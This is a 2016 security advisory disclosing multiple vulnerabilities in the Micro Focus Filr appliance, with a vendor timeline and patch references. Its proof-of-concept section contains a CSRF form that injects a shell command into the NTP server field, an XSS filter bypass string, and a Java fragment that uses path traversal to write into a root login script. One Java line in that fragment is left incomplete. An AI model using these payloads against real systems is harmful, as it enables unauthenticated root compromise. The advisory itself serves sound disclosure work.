Micro Focus Filr 2 - Multiple Vulnerabilities





SEC Consult Vulnerability Lab Security Advisory < 20160725-0 >
              title: Multiple vulnerabilities 
            product: Micro Focus (former Novell) Filr Appliance
 vulnerable version: Filr 2 <=, Filr 1.2 <=
      fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871
         CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609
                     CVE-2016-1610, CVE-2016-1611
             impact: critical
           homepage: https://www.novell.com/products/filr/
              found: 2016-05-23
                 by: W. Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab 

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich


Vendor description:
"Unlike other mobile file access and collaborative file sharing solutions, Micro
Focus Filr has been designed with the enterprise in mind, resulting in less
administration, better security and more productive users."

URL: https://www.novell.com/products/filr/

Business recommendation:
During a very quick security check several vulnerabilities with high impact 
have been discovered. SEC Consult recommends to immediately apply the patches 
provided by Micro Focus to address these issues. 

Please note that since SEC Consult did not conduct a thorough technical security
check SEC Consult cannot make a statement regarding the overall security of the
Micro Focus Filr appliance.

Vulnerability overview/description:
During a quick security check several vulnerabilities have been identified that 
ultimately allow an attacker to completely compromise the appliance:

1) Cross Site Request Forgery (CSRF) - CVE-2016-1607
Several functions within the appliance's administative interface lack protection
against CSRF attacks. This allows an attacker who targets an authenticated 
administrator to reconfigure the appliance.

2) OS Command Injection - CVE-2016-1608
The appliance administrative interface allows an authenticated attacker to 
execute arbitrary operating system commands. Please note that an attacker can 
combine this vulnerability with vulnerability #1. In this scenario, an attacker 
does not need to be authenticated.

3) Insecure System Design
The appliance uses a Jetty application server to provide the appliance 
administration interface. This application server is started as the superuser 
"root". Please note that combined with vulnerability #1 and #2 an attacker can
run commands as the superuser "root" without the need for any authentication.
For vendor remark on #3 see solution section.

4) Persistent Cross-Site Scripting - CVE-2016-1609
The Filr web interface uses a blacklist filter to try to strip any JavaScript 
code from user input. However, this filter can be bypassed to persistently 
inject JavaScript code into the Filr web interface.

5) Missing Cookie Flags
The httpOnly cookie flag is not set for any session cookies set by both the 
administrative appliance web interface and the Filr web interface. Please note 
that combined with vulnerability #4 an attacker can steal session cookies of 
both the appliance administration interface and the Filr web interface (since 
cookies are shared across ports).
For vendor remark on #5 see solution section.

6) Authentication Bypass - CVE-2016-1610
An unauthenticated attacker is able to upload email templates.

7) Path Traversal - CVE-2016-1610
The functionality that allows an administrator to upload email templates fails 
to restrict the directory the templates are uploaded to. Please note that 
combined with vulnerability #6 an attacker is able to upload arbitray files with
the permissions of the system user "wwwrun".

8) Insecure File Permissions - CVE-2016-1611
A file that is run upon system user login is world-writeable. This allows a local 
attacker with restricted privileges to inject commands that are being executed
as privileged users as soon as they log into the system. Please note that 
combined with vulnerabilities #6 and #7 an unauthenticated attacker can inject 
commands that are executed as privileged system users (e.g. root) using the Filr
web interface.

Proof of concept:
1, 2, 3)
The following HTML fragment demonstrates that using a CSRF attack (#1) system 
commands can be injected (#2) that are executed as the user root (#3):

----- snip -----
    <form action="https://<host>:9443/vaconfig/time" method="POST">
      <input type="hidden" name="ntpServer" value="0.novell.pool.ntp.org 1.novell.pool.ntp.org';id>/tmp/test;'" />
      <input type="hidden" name="region" value="europe" />
      <input type="hidden" name="timeZone" value="Europe/Vienna" />
      <input type="hidden" name="utc" value="true" />
      <input type="hidden" name="_utc" value="on" />
      <input type="submit" value="Submit request" />
----- snip -----

The following string demonstrates how the XSS filter can be circumvented:
<img src='>' onerror='alert(1)'>

This string can e.g. be used by a restricted user in the "phone" field of the 
user profile. The script is executed by anyone viewing the profile (e.g. admins).

None of the session cookies are set with the httpOnly flag.

6, 7, 8)
The following Java fragment demonstrates how an unauthenticated attacker (#6) 
can overwrite a file in the filesystem (#7 & #8) that is executed upon user login 
of e.g. the root user:

----- snip -----
String sessionCookie = "sectest";
String host = "http://<host>/";

ProxySettings settings = new ProxySettings();
HttpCookie cookie = new HttpCookie("JSESSIONID", sessionCookie);

settings.setCookieManager(new CookieManager());
settings.getCookieManager().getCookieStore().add(new URI(host), cookie);

settings.setModuleBaseUrl(host + "ssf/gwt/");
GwtRpcService svc = SyncProxy.createProxy(GwtRpcService.class, settings);

VibeXsrfToken token = new VibeXsrfToken(
((HasRpcToken) svc).setRpcToken(token);

String fileName = "../../../../etc/profile.d/vainit.sh";
FileBlob fileBlob = new FileBlob(ReadType.TEXT, fileName, "", 1l, 4, 1l, false, 4l);
fileBlob.setBlobDataString("id > /tmp/profiledtest\n");
BinderInfo folderInfo = new BinderInfo();
folderInfo.setBinderId((long) 1);
VibeRpcCmd cmd = new UploadFileBlobCmd(folderInfo, fileBlob, true);
HttpRequestInfo ri = new HttpRequestInfo();
svc.executeCommand(ri, cmd);
----- snip -----

Vulnerable / tested versions:
The version of Micro Focus Filr was found to be vulnerable. This version 
was the latest version at the time of the discovery.

According to the vendor, Filr 1.2 is also vulnerable.

Vendor contact timeline:
2016-05-23: Sending encrypted advisory to security@novell.com, Setting latest
            possible release date to 2016-07-12
2016-05-24: Initial response from Micro Focus: forwarded the information to Filr
            engineering team
2016-06-13: Micro Focus releases patch to address issue #8
2016-06-14: Requested status update
2016-06-14: Micro Focus expects release of the patches in early July
2016-06-30: Asking for status update, answer of Micro Focus
2016-07-06: Micro Focus needs more time to patch issues, release re-scheduled for 15th
2016-07-12: Asking for status update; "final rounds of QA" at Micro Focus
2016-07-16: Postponing advisory release, patch not yet ready
2016-07-22: Patch release by Micro Focus
2016-07-25: Coordinated advisory release

The "Filr 2.0 Security Update 2" can be downloaded here and should
be applied immediately:
Those patches fix vulnerabilities #1, #2, #4, #6, #7

"Filr 1.2 Security Update 3" can be found here:

Knowledge base references at Micro Focus:
Issue #1: https://www.novell.com/support/kb/doc.php?id=7017786
Issue #2: https://www.novell.com/support/kb/doc.php?id=7017789
Issue #4: https://www.novell.com/support/kb/doc.php?id=7017787
Issue #6 & #7: https://www.novell.com/support/kb/doc.php?id=7017788

Local privilege escalation via insecure file permissions (#8) has
already been fixed in the Filr 2.0 security update 1 in June:

Issue #3: According to Micro Focus, Jetty actually runs as user 
"vabase-jetty" but will pass commands off to another service on
the box that runs as root to perform privileged actions.
They have fixed the command injection in this release and the
next release will include much more stringent parameter validation
for passing the commands.

Issue #5: According to Micro Focus, a component of Filr does not
function properly when the httpOnly flag is enabled. This will be
addressed in a future release.


Advisory URL:


SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult? 
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Ettlinger / @2016